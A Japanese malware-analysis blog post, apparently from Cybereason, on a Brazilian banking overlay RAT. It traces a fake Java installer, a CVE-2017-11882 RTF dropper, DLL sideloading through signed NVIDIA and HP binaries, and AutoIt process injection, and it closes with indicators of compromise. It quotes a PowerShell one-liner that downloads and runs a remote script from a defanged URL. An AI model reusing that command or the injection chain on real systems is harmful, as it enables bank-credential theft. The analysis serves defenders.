調査・研究者：ASSAF DAHAN

過去10年以上にわたりブラジルは、金融機関の顧客を標的としたスキャミングが横行している地域の1つであり、ソーシャルエンジアリング攻撃や銀行を狙ったトロイの木馬攻撃を頻繁に経験しています。

攻撃者は独創的で最新の情報に精通しており、グローバルレベルで攻撃の手法と攻撃のトレンドを把握しています。そしてさまざまな方法でそれらを利用し、ブラジルの市場とユーザーを標的に攻撃を仕掛けているのです。攻撃者は絶えず攻撃のテクニックに変更を加え、その改良を行い、従来のセキュリティ製品の検知を逃れており、標的になった被害者は攻撃を受けていることに気付きません。

これらの攻撃者が用いるTTP（ツール、技術、攻撃の手順）は進化を続けているのです。攻撃者がここ最近用いる特に興味深い手口の1つに、HPやNVIDIA、RealTek、VMwareなどの信頼できる企業が署名した正規のバイナリをさまざまな方法で悪用する手法があります。

攻撃者はこの手法により悪意のあるコードをカモフラージュし、DLLハイジャッキングを通じてコードがローディングされるようにしたり、正規のアプリケーションにコードをインジェクションしたりしています。

サイバーリーズンは、ブラジルにおける脅威の動向を継続的に観察し、いくつかの攻撃活動を追跡しており、AIベースの振舞い検知の機能を用いて、興味深いステルス型攻撃のライフサイクルを明らかにし、その分析を行っています。このブログでは、このライフサイクルについてご説明します。

オーバーレイRAT攻撃

多数のテクニックを用いて、サイバーリーズンは最近、ある興味深い多段階の攻撃活動について観察を行い、その動向を注視してきました。この攻撃活動では、金融機関の顧客を標的とするマルウェアの変種を、ソーシャルエンジアリングを用いて相手のマシンに感染させます。このマルウェアは多くの場合、Remoto RATと呼ばれています。このマルウェアでは、攻撃者は標的のコンピューターを完全にコントロールすることができます。また、ブラジルの多くの金融機関で採用されている2要素認証のセキュリティを、このマルウェアは無効にしてしまいます。

感染ベクター1：偽のJAVAインストーラー

Cybereasonのテレメトリは、ある不審な動きを捉えました。Chromeブラウザでのサイトの閲覧を通じ、偽のJavaインストーラーがダウンロードされていたのです。

このIPアドレスは以下のドメインに対して解決されています。

このWebサイトが、正規のJavaダウンロードサイトを装ったフィッシングサイトであるのは明らかです。このサイトには、ブラジルのユーザーを標的としたローカライズが施されています。

この内容に不審を抱かないユーザーは言われるがままにJavaのアップデートをダウンロードしてしまいます。このアップデートには以下のZipファイルが含まれています。

ファイルを解凍した際に展開される7zipのコマンドライン

「C:\Program Files\7-Zip\7zFM.exe” “C:\Users\]REDACTED]\Downloads\Java-install6375727.zip」
Zipファイルには怪しいほど小さな以下の実行ファイル（10KB）が含まれていました。

Java.exe（SHA-1:75A29FEC62A95B4C820454CD82DDF70742A67602）
この実行ファイルを静的に分析したところ、以下に示すファイルの説明のように、さらに不審な特徴が明らかになりました。

同様に、PDBのパスにも、「HowToRunPowerShell」という記述を確認できます。

このPDBパスは明らかに、ある公開のコードプロジェクトに言及しており、そのプロジェクトのトピックは「How to run PowerShell scripts from C#（C#からPowerShellスクリプトを実行する方法）」となっています。

以下のコンパイラーの署名が示すように、このjava.exeファイルは予想に反し、.NETで記述されていました。

.NETバイナリには難読化の処理が施されていますが、この処理を解除すると、プレーンテキストのC#のコードが確認できました。このきわめて小さな実行ファイルで意図していることはたった1つだけです。それは、2つ目のペイロードのダウンロードです。この内容を以下に示します。

Cybereasonのユーザーインターフェースからこの偽のJavaインストーラーを実行したところ、cmd.exeとPowerShellダウンローダーが生成されました。

ダウンローダーは以下のイメージファイルのダウンロードを試みました。

「C:\Windows\System32\cmd.exe” /C powershell -nop -c “iEx(New-Object Net.WebClient).DownloadString(‘hxxps://cl[.]ly/f6f5fac35d25/download/testepepeu.jpg’)」

このイメージファイルの実体は、難読化が施されたPowerShellスクリプトです。
Testepepeu.jpg ：934BF6E81040089253C209A6B4286A235C240473
その構造、文字列、命名規則の点で、このPowerShellスクリプトは、ブラジルやチリにおけるサイバー攻撃に関連して作成されたスクリプトとほぼ同一です。

2つ目のペイロードのダウンロードに先立ち、このPowerShellスクリプトはいくつかの動作チェックを行っており、たとえば、VMwareやVirtualBoxなどの仮想マシンで機能が動作するかなどを確認しています。

すでに見たように、このコードにはポルトガル語で記述された多くのリファレンスが存在し、攻撃者の母語がポルトガル語であることがより一層はっきりと示されています。

このPowerShellスクリプトで意図しているのは、SSLの認証処理のほか、「open.zip」と呼ばれる別のZipファイルのコンテンツをダウンロード、抽出、実行することです。これは、金融機関の顧客を狙ったマルウェアでよく確認されている挙動と同じです。

Open.zip：7C5F9C7541FE56FA11703156086D9F9D9C735800

このZipファイルにはパスワードが掛かっていませんが、それでも、このファイルがアンチウイルスソフトウェアで検出される率はきわめて低くなっています。

Zipファイルには以下の3つのファイルが含まれています。

ペイロードの分析：正規のバイナリの悪用

ファイル名	SHA-1ハッシュ	用途などの説明
Nvstlink.exe	7FF99C01BADAD20BF153483E31BDEAD611D6D203	署名が施されたNVIDIAの正規の実行ファイルです。
OPENGL32.DLL	8E12FF6CFC217D5C9A6D1A7487634E50ABEB672E	署名が施されたNVIDIAの実行ファイルによってサイドローディングされた偽のDLLです。メインのペイロードの暗号を解除し、そのペイロードをメモリにローディングします。
Soungs.config	0EA42E64F4C8653D865EEA79EB3B37B81206CAC1 （VirusTotalにとっては未知）	暗号化されたマルウェアのペイロードです。

攻撃者はDLLハイジャッキングと呼ばれるよく知られた手法を用いて、署名が施された正規の脆弱なバイナリを悪用しています。これは、ブラジルの金融機関の顧客を狙い、AutoITバイナリの脆弱性を突くマルウェアで過去に確認されているテクニックです。

以下の例では、攻撃者は署名が施されたNVIDIAの正規のバイナリ（nvstlink.exe）を選択しています。このバイナリはDLLハイジャッキングに対して脆弱です。

Nvstlink.exeのインポートテーブルを見ると、このファイルは実行されるとすぐにOPENGL32.DLLのロードを試みることがわかります。

厳密に言えば、攻撃者は実行ファイルが必要とするオリジナルのOPENGL32.DLLを偽のOPENGL32.DLLと入れ替えており、この偽のOPENGL32.DLLが同じフォルダ内にある「soungs.config」ファイルを見つけてその内容の暗号を解除し、メモリにロードします。この様子を以下に示します。

暗号が解除されたペイロードはnvstlink.exeのメモリ空間の3つのメモリ領域にマッピングされます。一番目の領域（0x3530000 – RW）はPEヘッダーとなり、2番目の領域（0x3531000 – RWX）はペイロードの実行パートになります。そして、3番目の領域は実行ファイル（RW）全体のコピーです。この内容を以下に示します。

感染ベクター2：CVE 2017-11882で兵器化したRTFドキュメント

サイバーリーズンでは、もう1つ別の感染ベクターについても観察を行いました。この感染ベクターでもソーシャルエンジアリングを用いてユーザーを欺き、Wordのドキュメント（実際にはRTFドキュメント）をユーザーに開かせます。

https://www.virustotal.com/#/file/e7b96141c68d215a249abfe8f70ceb3ef934d1857ebae70953dc30a0b542ad06/detection

Didier Steven氏のrtfdump.pyを用い、rtfdump.py -f O [file]というコマンドを使用してRTFドキュメントを調べたところ、オブジェクトが埋め込まれた3つのエントリーが確認できました。

そして、2つのエントリーに言及した「Equation.3」と呼ばれるリファレンスが見つかったほか、数式エディタの脆弱性（CVE 2017-11882）として知られる欠陥を悪用しているらしいことも判明しました。この内容を以下に示します。

組み込みになっているセクションをダンプしてデコードしてみると、以下のペイロードが複数のエントリー間で分割されていることがわかりました。

セクション7で見つかったPowerShellペイロード

PowerShellのダウンローダーを呼び出す、%tmp%フォルダ内に投下されたペイロード

セクション10で見つかった、投下された「love.bat」スクリプトの実行

ダウンロードされた.pngファイルの実体はPowerShellのファイルであり、このファイルを検出できる確率はごくわずかです。
hxxps://cl[.]ly/0b2E2g2c3y2L/download/newpepe.png
https://www.virustotal.com/#/file/ba203c49d639b4de69c31cea2c378d255a0318e133d9e859c8786dae2ce5445e/detection

このPowerShellスクリプトは、最初の例で示したPowerShellスクリプトとほぼ同じで、ファイル名とURLが若干異なります。このスクリプトを以下に示します。

このPowerShellは、「new10.zip」と呼ばれるZipファイルのコンテンツをダウンロード、抽出、実行します。
https://www.virustotal.com/#/file/5f07d1b49b6b32d8b966f4c3c6694d10822746f80c1a4a494440bf913e934cd9/detection

ファイル名	SHA-1ハッシュ	用途などの説明
hpdriver.exe	4F66783ACE879E221C0DB62A92C21FFE587F7B3B	「security.config」と呼ばれるコンテンツの暗号を解除してロードし、nvstlink.exeにインジェクションします。
nvstlink.exe	11942D70B3180C860778F160F15EB4ABC4B159D9	HPが署名した正規のバイナリです。正規のホストとして、マルウェアのコードをインジェクションする目的に悪用されます。オリジナルのファイル名は「LHBeacon.exe」です。
security.config	2335F8CFAC306406929459B8A21047F007A7908F	暗号化されたオーバーレイRATペイロードです。

HPDRIVER.EXE：AUTOITローダーの分析

このバイナリ文字列を静的に分析したところ、以下のような組み込みのAutoItスクリプトが存在することがわかりました。

リソースセクションを調べた結果、コンパイルフォーマットのスクリプトを含むRCDATAセクションの存在が明らかになりました。この内容を以下に示します。

Exe2Autというツールを使用すると、スクリプトをもとのかたちに逆コンパイルできます。逆コンパイルしたスクリプトのコードは、6,765行を超えました。

このスクリプトを分析したところ、コードの大半は、公開されているコーディングプロジェクトから「そのまま」コピーされていることがわかりました。以下にプロジェクトの例を示します。
・Subrogation.au3
・Dataloader

このスクリプトはローダーの役割を果たし、以下の処理を実行します。

1. 「security.config」（RATペイロード）のコンテンツを見つけ出し、その暗号を解除する

2. 暗号を解除したローダーバイナリをロードしてメモリにマッピングする。エクスポートした関数「x」（以下を参照）を実行する

3. この関数がワイルドカードの検索を用いてnvstlink.exeを探し出す

4. 見つかったnvstlink.exeは以下のようにCreateProcessAを用いてサスペンドモードで起動される

5. nvstlink.exeは「MYHOOK」というリソースを探し出し、これをメモリにロードする

RT_RCDDATA（SHA-1 5C1AD7C4CD06316172E4AA579C9EB9159C72DBAA）内の「MYHOOK」リソースを調査した結果、このリソースが実際には、RATペイロードを含むembeddedDLLの1つであることがわかりました。このリソースは以下の言語設定に基づきブラジルでコンパイルされたものとみられます。

6. nvstlink.exeをサスペンド状態にして、そのnvstlink.exeに、暗号を解除したRAT DLLをインジェクションする。インジェクションでは、以下に示す標準的なコードインジェクションAPIチェーンに従う

7. nvstlink.exeを再開してから、スクリプトを終了する
このインジェクションは、Cybereasonのプラットフォームでも補足できました。

コードのインジェクションやメモリの操作など、不審な振舞いのパターンや悪意のある振舞いのパターンに対し、Cybereasonは以下のようにフラグ付けを行います。

感染ベクター1と感染ベクター2では、注目に値する違いがあります。どちらのケースでも攻撃者は、署名されたバイナリに対する信頼を悪用し、これらのアプリケーションを使って悪意のあるRATコードを隠蔽しています。しかし、コードを標的のシステムに組み込む方法が異なります。感染ベクター1においては標準的なDLLハイジャッキングが使用されていますが、感染ベクター2においては、コードインジェクションが用いられています。このような違い以外に、これらの感染ベクターでは、さらに際立った特徴があります。explorer.exeやsvchost.exeのようなWindowsのホストプロセスにコードをインジェクションするのを攻撃者は避けており、サードパーティが提供する署名された正規のアプリケーションをダウンロードし、そのなかに悪意のあるコードを埋め込んでいるのです。こうすれば、不審を抱かれず相手のシステムにコードを組み込めると期待したのでしょう。

オーバーレイRATの分析

関連するメモリ領域をダンプしてその修復を行った後に、ペイロードを解凍し、その暗号を解除して、内容を分析できるようにしました。ダンプしたペイロードは以下のようにDelphiで記述されていました。これは、RATに関するほかのレポートの内容と一致する事実です。

コンパイルの処理が行われた日付は以下に示すように、2018年8月となっています。

ダンプしたファイルセクションを調べたところ、最も大きなセクションは以下の.rsrc sectionであることがわかりました。

RT_RCDATAセクションのなかのリソースを見ると、ポルトガル語のテキストが付いた20を超えるイメージが存在しているのがわかります。

個々のイメージには銀行などブラジルで業務を行っている金融機関からと見せかけたメッセージが含まれており、セキュリティを理由に、2要素認証のトークンやパスワードの提出を求めています。このようなイメージを保存している理由は、イメージベースのフィッシングに使用するためです。これはブラジルのサイバー犯罪で非常によく使われる手口です。マルウェアは透過的なブラウザのスクリーンオーバーレイを使用してユーザーを欺き、ユーザーは不審を抱かないままにトークンなどの認証情報を提出してしまいます。これで2要素認証やアウトオブバンド認証は効力を失ってしまうのです。

解凍したバイナリのなかに見つかったイメージの例

Santander Bankのメッセージ

Banco do Brasilのメッセージ

Itau Unibancoのメッセージ

ユーザーが標的となったその他の著名なブラジルの金融機関には次のようなものがあります。

• Banco Bradesco
• Sicredi
• Unicred do Brasil
• Sicoob
• Banco de Inter
• Banco de Nordeste
• Banco Mercantil do Brasil
• Caixa Economica Federal

マルウェアはユーザーのブラウザをフィッシングの罠に掛け、その構成のなかに見つかった金融機関へのアクセスを監視します。マルウェアのストリングはメモリ内に暗号化されて保存されており、対象のWebサイトへアクセスの処理が行われると、暗号が解除されます。

解凍されたバイナリのなかには以下のように、マルウェアが通信を行うサーバーの文字列も含まれています。

注目に値するのは、解凍されたRATバイナリであっても、VirusTotalでの検知率が比較的低い点です。
https://www.virustotal.com/#/file/3b688c523a18408cc65866f6447e71d1148c198fcd6251c290ae53c90f766946/detection

まとめ

このブログでは、ある攻撃活動について調査を行い、ブラジルのサイバー犯罪者がどのような手口で金融機関の顧客を標的に攻撃を仕掛けているのか明らかにしました。コードインジェクションやDLLハイジャッキング、RTFエクスプロイト、PowerShellのダウンロードなどを用いて正規のバイナリを悪用する手口は新しいものではありません。しかしこの手法を、手の込んだソーシャルエンジアリングのテクニックと組み合わせれば、非常に威力のある成功率の高い多段階の感染チェーンが誕生します。

さらに今後数週間を目途に2つ目のブログを発表する予定であり、そのブログでは、金融機関の顧客を標的としたブラジルにおける別のサイバー攻撃活動を取り上げます。このサイバー攻撃では、検知を逃れるためにずっとステルス性の高い攻撃手法が使われています。

セキュリティ侵害の痕跡

FILES

e0247073e68070413235a8aa92008de2970e1bf0
9B6016D9523DE39BF2E5F854549CED9A3F35BE85
4F66783ACE879E221C0DB62A92C21FFE587F7B3B
5C1AD7C4CD06316172E4AA579C9EB9159C72DBAA
08359247B1F9069AA07F015921035F362185D665
87358CC245FDF172EC532C2B1C729E1A6F9CB18E
9422FAFBC54983EFB10A75A18F039A149F3C1CB2
8E12FF6CFC217D5C9A6D1A7487634E50ABEB672E
75A29FEC62A95B4C820454CD82DDF70742A67602
0EA42E64F4C8653D865EEA79EB3B37B81206CAC1
934BF6E81040089253C209A6B4286A235C240473
7C5F9C7541FE56FA11703156086D9F9D9C735800
BBC8628F92209364C79EC38284DC772B81100BD7
0EA42E64F4C8653D865EEA79EB3B37B81206CAC1
2203714D747145F9363A6F0DE0D5E7F2FEA792AA
222D89261CB18D5EB26AC84041BFA0E1B399A2D5
B77DD8A56F480F052E262ABF9FB856E8B9F8757D
363E4734F757BDEB89868EFE94907774A327695E (SSL Certificate – x.cer)

DOMAINS

Cl[.]ly
Flashplayers2018[.]com
Javadownloadbrasil[.]site
Musicalad[.]com[.]br
Nfmicrosoft[.]com
netframework2018-microsoft[.]com

URLS

hxxp://185.135[.]9[.]102/suspiro/index.php
hxxp://198.50[.]138[.]133/latex/index.php
hxxp://198[.]50.138[.]131/hilton/index.php
hxxp://corretorandremendes[.]com[.]br/images/contA/ponto.php
hxxp://f[.]cl[.]ly/items/1k3W1B0G0a3P0O41220g/open.zip
hxxp://flashplayers2018[.]com/WEBFLASH_IESS.DOC
hxxp://x.ss2[.]us/x.cer – SSL certificate
hxxps://cl.ly/390j3n40002a/download/new10[.]zip
hxxps://cl[.]ly/0a5f7eb35382/download/flatrom.jpg
hxxps://cl[.]ly/0b2E2g2c3y2L/download/newpepe.png
hxxps://cl[.]ly/694965a97454/download/xalita.jpg
hxxps://cl[.]ly/8a89ef6803d6/download/paulo.jpg
hxxps://cl[.]ly/f6f5fac35d25/download/testepepeu.jpg’
hxxps://s3[.]amazonaws[.]com/f.cl.ly/items/2y1A3w3I3K12242b0r36/new10.zip?AWSAccessKeyId=AKIAJEFUZRCWSLB2QA5Q&Expires=1531388058&Signature=VDxQ29GFO%2FqanJvH0SZP3yH87CE%3D&response-content-disposition=attachment
hxxps://supgmx[.]egnyte[.]com/dd/PPlFR0ONrE/

IPS

185.135[.]9[.]102
198.50[.]138[.]133
198.50[.]138[.]131

ホワイトペーパー「すべての組織が狙われている」

企業、組織がどんなにセキュリティを強固にしてもハッカーが悪用できる脆弱性は必ず存在します。侵入されることが避けられないことを受け入れ、新たな対策を立てる必要があります。本書で、なぜ避けられないのか、どのように対処するのかをご覧ください。
https://www.cybereason.co.jp/product-documents/input/?post_id=606